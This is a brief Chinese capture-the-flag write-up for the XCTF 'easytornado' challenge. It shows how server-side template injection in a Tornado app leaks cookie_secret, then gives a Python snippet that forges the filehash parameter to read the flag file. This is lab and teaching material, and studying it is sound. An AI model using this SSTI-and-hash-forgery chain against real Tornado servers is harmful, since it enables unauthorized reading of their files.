XCTF的easytornado题目

py是个好工具,要多加以利用
XCTF的easytornado题目_第1张图片XCTF的easytornado题目_第2张图片![在这里插入图片描述](https://img-blog.csdnimg.cn/20200707170233593.png

经过分析。看到题目的关键点在于找到cookie_secret.
于是想到两种方法:
1. 利用彩虹表通过反向找到cookie_secret的内容
2. 是否存在ssti漏洞,可以直接找到cookie_secret文件
尝试一些后发现存在ssti漏洞
XCTF的easytornado题目_第3张图片

看别人的writeup,发现tornado的handler.settings能够找到,于是

在这里插入图片描述
然后用python用md5加密文件

import hashlib


cookie_secret='3321c76a-3b14-4d5a-8b61-98944f97fd29'
#hashlib.md5(cookie_secret+md5(filename))
k=cookie_secret+hashlib.md5('/fllllllllllllag'.encode(encoding='UTF-8')).hexdigest()
m=hashlib.md5(k.encode(encoding='UTF-8')).hexdigest()
print(m)

然后通过得出的m输入到filehash后面,得到flag。
file?filename=/fllllllllllllag&filehash=

你可能感兴趣的:(渗透测试)